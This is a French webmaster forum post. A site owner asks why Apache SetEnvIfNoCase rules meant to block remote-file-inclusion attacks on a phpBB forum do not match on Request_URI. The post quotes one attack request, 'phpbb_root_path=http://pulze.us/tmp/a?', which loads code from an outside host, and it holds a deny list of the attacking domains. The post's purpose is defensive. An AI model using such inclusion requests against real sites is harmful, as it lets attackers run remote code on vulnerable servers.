config apache.conf pour blocker des url avec filtres?
1 message
• Page 1 sur 1
- Recif
- WRInaute impliqué

- Messages: 816
- Inscription: 25 Aoû 2004
config apache.conf pour blocker des url avec filtres?
Bonjour,
J'essaye de blocker des "abuse filter" qui pleuvent en ce moment sur un de mes sites via le forum phpbb. J'utilise mon fichier apache.conf car j'aimerais le générailiser à tous les sites présents sur le serveur.
voici la syntaxe que j'utilise et qui fonctionne avec le user_agent, mais pas avec Request_URI :
SetEnvIfNoCase user-agent "Website eXtractor" getout
SetEnvIfNoCase Request_URI pulze\.us getout
SetEnvIfNoCase Request_URI cpanelturkiye\.com getout
<Files ~ "^.*$">
order allow,deny
Allow from all
deny from env=getout
</Files>
DOnc les hosts se connectant avec le user agent "Website eXtractor" sont bien bloqués mais ceux qui envoient une url du type test.php?phpbb_root_path=http://pulze.us/tmp/a? ne le sont pas... Est ce que j'ai loupé quelque chose au niveau syntaxe?
Merci
J'essaye de blocker des "abuse filter" qui pleuvent en ce moment sur un de mes sites via le forum phpbb. J'utilise mon fichier apache.conf car j'aimerais le générailiser à tous les sites présents sur le serveur.
voici la syntaxe que j'utilise et qui fonctionne avec le user_agent, mais pas avec Request_URI :
SetEnvIfNoCase user-agent "Website eXtractor" getout
SetEnvIfNoCase Request_URI pulze\.us getout
SetEnvIfNoCase Request_URI cpanelturkiye\.com getout
<Files ~ "^.*$">
order allow,deny
Allow from all
deny from env=getout
</Files>
DOnc les hosts se connectant avec le user agent "Website eXtractor" sont bien bloqués mais ceux qui envoient une url du type test.php?phpbb_root_path=http://pulze.us/tmp/a? ne le sont pas... Est ce que j'ai loupé quelque chose au niveau syntaxe?
Merci
1 message
• Page 1 sur 1
Lectures recommandées sur ce thème :
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 1 invité
